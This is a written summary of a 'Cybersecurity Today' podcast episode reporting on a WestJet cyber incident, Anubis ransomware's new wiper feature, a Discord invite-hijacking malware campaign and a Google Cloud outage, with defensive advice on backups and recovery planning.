Detailed Summary of "Cybersecurity Today" Podcast Episode

Podcast Information:

• Title: Cybersecurity Today
• Host/Author: Jim Love (episode hosted by David Shipley)
• Description: Updates on the latest cybersecurity threats to businesses, data breach disclosures, and strategies to secure your firm in an increasingly risky environment.
• Episode: Cybersecurity Today: WestJet Cyber Incident, Anubis Ransomware Evolution, Discord Exploits, and Google Cloud Outage
• Release Date: June 16, 2025

Introduction

In this episode of Cybersecurity Today, host David Shipley delves into several pressing cybersecurity issues impacting businesses and digital platforms. He covers the recent cyber incident at WestJet, the evolving threats posed by Anubis ransomware, malicious exploits on Discord, and a significant outage in Google Cloud services. The discussion emphasizes the increasing sophistication of cyber threats and the critical importance of robust security measures for organizations.

1. WestJet Cybersecurity Incident

Overview: David Shipley begins by reporting a cybersecurity incident involving WestJet, Canada's second-largest airline. The incident, confirmed on a Friday night, disrupted access to WestJet's mobile application and internal systems.

Company Response: WestJet issued a public statement on social media, acknowledging the incident:
"We are aware of a cybersecurity incident involving internal Systems and the WestJet app, which has restricted access for several users."
(Timestamp: 00:45)

The airline activated its internal response team and is collaborating with law enforcement and Transport Canada to investigate the breach. An update on Saturday night confirmed that flight operations remained safe and unaffected.

Impact and Analysis: While technical details remain undisclosed, the incident underscores the vulnerability of aviation firms, which rely heavily on real-time digital systems and maintain strict regulatory oversight. Shipley emphasizes the importance of timely and transparent communication in preserving public trust during such incidents.

Notable Quote: "WestJet's disruption underscores the growing risk that cyber attacks pose to operational continuity."
(Timestamp: 05:30)

2. Evolution of Anubis Ransomware

Overview: Shipley shifts focus to the evolving landscape of ransomware threats, highlighting Anubis Ransomware as a Service (RaaS). First observed in December 2024, Anubis has expanded its operations in 2025 through an affiliate program offering substantial revenue sharing.

Technical Advancements: Research by Trend Micro reveals that Anubis has integrated a wiper module into its ransomware payload. This addition allows attackers to irreversibly delete file contents, reducing them to zero bytes while preserving directory structures. The wiper function can be activated via a command line parameter, adding a layer of pressure on victims by sabotaging recovery efforts even if a ransom is paid.

Implications: This development marks a significant shift in ransomware tactics from purely financial motives to incorporating data destruction as a punitive measure. Organizations are urged to enhance their disaster recovery plans and ensure that offline backups are both regular and secure.

Notable Quote: "Anubis's evolution highlights a growing trend towards irreversible punitive ransomware tactics."
(Timestamp: 12:15)

Additional Insights: Shipley details the technical mechanisms of Anubis, including its use of elliptic curve integrated encryption schema (ECIs) and process interference to thwart system safeguards. The ransomware targets high-value victims, primarily initiating infections through phishing emails containing malicious links or attachments.

3. Discord Malware Exploits

Overview: The podcast then examines a sophisticated malware campaign exploiting Discord's vanity invite system. Attackers utilize expired or deleted invite codes to redirect users to malicious servers, delivering payloads like the Async RAT (Remote Access Trojan) and the Skuld Information Stealer.

Technical Mechanism: Victims are lured to rogue servers where they are prompted to verify their accounts by executing a PowerShell command. This action initiates a multi-stage payload download:

1. A PowerShell script hosted on Pastebin downloads a first-stage loader.
2. The loader retrieves Async RAT and Skuld Stealer from BitBucket and GitHub.
3. Final payloads execute on the victim's system, providing attackers with remote access and stealing sensitive data, including cryptocurrency wallet seed phrases.

Attack Techniques: The campaign employs advanced evasion techniques, such as:

• Social Engineering: Convincing users to manually execute clipboard-loaded PowerShell commands.
• Sandbox Evasion: Implementing time-based execution delays and environment checks to bypass endpoint security tools.
• Data Exfiltration: Using Discord webhooks to blend malicious activity into normal platform traffic.

Impact and Response: The exploitation has targeted regions including the United States, Vietnam, France, Germany, Austria, the Netherlands, and the United Kingdom. Discord responded by disabling a malicious bot involved in the campaign. A secondary campaign was also identified, disguising its loader as a cheat tool for pirated games.

Notable Quote: "This incident highlights how trust in platform features such as Discord invites can be turned against users when security design gaps are exploited."
(Timestamp: 21:40)

Recommendations: Shipley advises organizations and users to exercise caution when interacting with previously trusted links and to remain vigilant against exploiting features in widely used platforms.

4. Google Cloud Service Outage

Overview: In a deviation from cybersecurity incidents, Shipley discusses a significant service disruption experienced by Google Cloud on Thursday. The outage, lasting several hours, was caused by a misconfigured quota update in Google's API management infrastructure.

Technical Details: The outage commenced at approximately 10:49 AM Eastern Time and continued until 3:49 PM Eastern Time. An invalid automated quota update led API requests to return 503 errors, crippling both Google's own services and third-party platforms reliant on Google Cloud.

Impact: Services affected included Gmail, Google Calendar, Google Docs, Google Meet, Google Drive, and more. External applications like Spotify, Discord, Snapchat, Firebase, and select Cloudflare applications also suffered disruptions.

Recovery and Response: Google's incident summary attributed the failure to inadequate testing and insufficient error handling protocols. Recovery involved bypassing the malfunctioning quota check, though some regions experienced extended delays due to overloaded policy databases. Cloudflare confirmed that its Workers KV Key Value Store was impacted, leading to significant service interruptions despite no data loss.

Notable Quote: "This incident is a stark reminder of the fragility of interconnected digital services. Single misconfiguration at the cloud infrastructure layer can ripple across dozens of dependent platforms."
(Timestamp: 29:50)

Implications: Shipley emphasizes the importance of robust automation and oversight in cloud infrastructures. He advocates for the regulation of major cloud providers akin to other critical infrastructures like banks and telecommunications to prevent such widespread disruptions.

Conclusion and Recommendations

In wrapping up the episode, Shipley reinforces the critical need for organizations to maintain and regularly test their disaster recovery plans. This preparedness is essential to mitigate the impact of both ransomware attacks and significant service outages like those experienced by Google Cloud.

Closing Advice: "Whether it's to protect you from disruptive ransomware or major cloud provider outages, a good plan that's well tested is your best friend."
(Timestamp: 35:10)

He encourages listeners to stay updated, remain skeptical of suspicious activities, and continuously evaluate their security postures to safeguard against evolving cyber threats.

Final Remarks: David Shipley signs off, highlighting the value of listener engagement and previewing the return of Jim Love as the regular host in the following episode.

Stay Informed and Secure To keep up with the latest in cybersecurity, regularly tune into "Cybersecurity Today" and ensure your organization is equipped to handle the dynamic threat landscape.